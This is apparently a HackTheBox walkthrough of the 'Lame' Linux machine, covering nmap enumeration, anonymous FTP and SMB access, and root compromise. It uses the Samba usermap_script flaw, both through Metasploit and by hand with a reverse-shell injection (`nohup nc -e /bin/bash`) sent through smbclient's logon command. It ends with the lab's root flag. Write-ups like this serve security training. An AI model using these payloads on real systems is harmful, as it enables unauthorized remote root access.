Metadata
Difficulty: Easy
OS: Linux
Release Date: 14 Mar, 2017
Enumeration
Nmap
We start by running nmap
to discover the open ports on the machine.
┌──(kali㉿kali)-[~/HackTheBox/machines/Lame]
└─$ sudo nmap -sC -sV -oA nmap/initial 10.129.45.211
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-11 21:00 EST
Nmap scan report for 10.129.45.211
Host is up (0.11s latency).
Not shown: 996 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 10.10.14.4
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| vsFTPd 2.3.4 - secure, fast, stable
|_End of status
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
| 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| smb-os-discovery:
| OS: Unix (Samba 3.0.20-Debian)
| Computer name: lame
| NetBIOS computer name:
| Domain name: hackthebox.gr
| FQDN: lame.hackthebox.gr
|_ System time: 2024-02-11T21:01:00-05:00
|_smb2-time: Protocol negotiation failed (SMB2)
|_clock-skew: mean: 2h30m29s, deviation: 3h32m12s, median: 26s
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 63.74 seconds
From the Nmap scan, we discovered 4 open ports of interest.
Port 21/TCP - FTP
As FTP allows anonymous login, it was worth looking for interesting files. But the directory was empty.
┌──(kali㉿kali)-[~/HackTheBox/machines/Lame]
└─$ ftp 10.129.45.211
Connected to 10.129.45.211.
220 (vsFTPd 2.3.4)
Name (10.129.45.211:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -a
229 Entering Extended Passive Mode (|||15817|).
150 Here comes the directory listing.
drwxr-xr-x 2 0 65534 4096 Mar 17 2010 .
drwxr-xr-x 2 0 65534 4096 Mar 17 2010 ..
226 Directory send OK.
ftp>
We also have ftp version from the scan. Running searchsploit
against the version, we found an exploit.
┌──(kali㉿kali)-[~/HackTheBox/machines/Lame]
└─$ searchsploit vsftpd 2.3.4
------------------------------------------------------------
Exploit Title
------------------------------------------------------------
vsftpd 2.3.4 - Backdoor Command Execution
vsftpd 2.3.4 - Backdoor Command Execution (Metasploit)
------------------------------------------------------------
Shellcodes: No Results
Port 139,445/TCP - SMB
Running smbmap
we discovered one share we can access without credential.
We couldn't find anything interesting, when accessing the share with smbclient
.
┌──(kali㉿kali)-[~/HackTheBox/machines/Lame]
└─$ smbclient -N //10.129.45.211/tmp
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Sun Feb 11 23:44:47 2024
.. DR 0 Sat Oct 31 03:33:58 2020
.ICE-unix DH 0 Sun Feb 11 20:58:40 2024
vmware-root DR 0 Sun Feb 11 20:58:48 2024
.X11-unix DH 0 Sun Feb 11 20:59:06 2024
.X0-lock HR 11 Sun Feb 11 20:59:06 2024
5670.jsvc_up R 0 Sun Feb 11 20:59:54 2024
vgauthsvclog.txt.0 R 1600 Sun Feb 11 20:58:39 2024
7282168 blocks of size 1024. 5385872 blocks available
smb: \>
Running searchsploit
against the Samba version.
┌──(kali㉿kali)-[~/HackTheBox/machines/Lame]
└─$ searchsploit Samba 3.0.20
-------------------------------------------------------------------
Exploit Title
-------------------------------------------------------------------
Samba 3.0.10 < 3.3.5 - Format String / Security Bypass
Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution
Samba < 3.0.20 - Remote Heap Overflow
Samba < 3.6.2 (x86) - Denial of Service (PoC)
-------------------------------------------------------------------
Shellcodes: No Results
Following exploit looks promising:
Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit)
Exploitation
vsftpd 2.3.4
I tried executing the exploit we found during enumeration phase, but no session was created.
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
[*] No payload configured, defaulting to cmd/unix/interact
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 10.129.45.211
RHOSTS => 10.129.45.211
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit
[*] 10.129.45.211:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 10.129.45.211:21 - USER: 331 Please specify the password.
[*] Exploit completed, but no session was created.
msf6 exploit(unix/ftp/vsftpd_234_backdoor) >
Samba 3.0.20
Running discovered Metasploit exploit with setting necessary options. It opened up root shell on vulnerable machine.
msf6 exploit(multi/samba/usermap_script) > set RHOSTS 10.129.45.211
RHOSTS => 10.129.45.211
msf6 exploit(multi/samba/usermap_script) > set LHOST 10.10.14.4
LHOST => 10.10.14.4
msf6 exploit(multi/samba/usermap_script) > exploit
[*] Started reverse TCP handler on 10.10.14.4:4444
[*] Command shell session 1 opened (10.10.14.4:4444 -> 10.129.45.211:34448) at 2024-02-12 00:51:43 -0500
shell
[*] Trying to find binary 'python' on the target machine
[*] Found python at /usr/bin/python
[*] Using `python` to pop up an interactive shell
[*] Trying to find binary 'bash' on the target machine
[*] Found bash at /bin/bash
root@lame:/# id
id
uid=0(root) gid=0(root)
root@lame:/#
Manual Exploitation (Without Metasploit)
For this exploit, we will be crafting payload from this ruby script.
We have access to the /tmp
directory through anonymous login. After accessing the directory we use help
command to see what we can do from the shell.
┌──(kali㉿kali)-[~/HackTheBox/machines/Lame/exploits]
└─$ smbclient -N //10.129.45.211/tmp
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> help
? allinfo altname archive backup
blocksize cancel case_sensitive cd chmod
chown close del deltree dir
du echo exit get getfacl
geteas hardlink help history iosize
lcd link lock lowercase ls
l mask md mget mkdir
more mput newer notify open
posix posix_encrypt posix_open posix_mkdir posix_rmdir
posix_unlink posix_whoami print prompt put
pwd q queue quit readlink
rd recurse reget rename reput
rm rmdir showacls setea setmode
scopy stat symlink tar tarmode
timeout translate unlock volume vuid
wdel logon listconnect showconnect tcon
tdis tid utimes logoff ..
!
smb: \>
logon
command can be used to get a reverse connection to our local machine. To do that we will set up listener on our local machine:
┌──(kali㉿kali)-[~]
└─$ nc -lnvp 4455
listening on [any] 4455 ...
We can use following command to get a reverse shell:
logon "./=`nohup nc -e /bin/bash <IP> <port>`"
smb: \> logon "./=`nohup nc -e /bin/bash 10.10.14.4 4455`"
Password:
We can confirm the received connection on netcat listener.
┌──(kali㉿kali)-[~]
└─$ nc -lnvp 4455
listening on [any] 4455 ...
connect to [10.10.14.4] from (UNKNOWN) [10.129.45.211] 42732
id
uid=0(root) gid=0(root)
Spawning a TTY Shell
Python
python -c 'import pty; pty.spawn("/bin/bash")'
(inside the nc session) CTRL+Z;stty raw -echo; fg; ls; export SHELL=/bin/bash; export TERM=screen; stty rows 38 columns 116; reset;
Proof
root@lame:/root# hostname && whoami && cat root.txt && ip a
lame
root
18a4d9ed44993e8ba38336021d0b3b46
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast qlen 1000
link/ether 00:50:56:96:65:74 brd ff:ff:ff:ff:ff:ff
inet 10.129.45.211/16 brd 10.129.255.255 scope global eth0
inet6 dead:beef::250:56ff:fe96:6574/64 scope global dynamic
valid_lft 86396sec preferred_lft 14396sec
inet6 fe80::250:56ff:fe96:6574/64 scope link
valid_lft forever preferred_lft forever
root@lame:/root#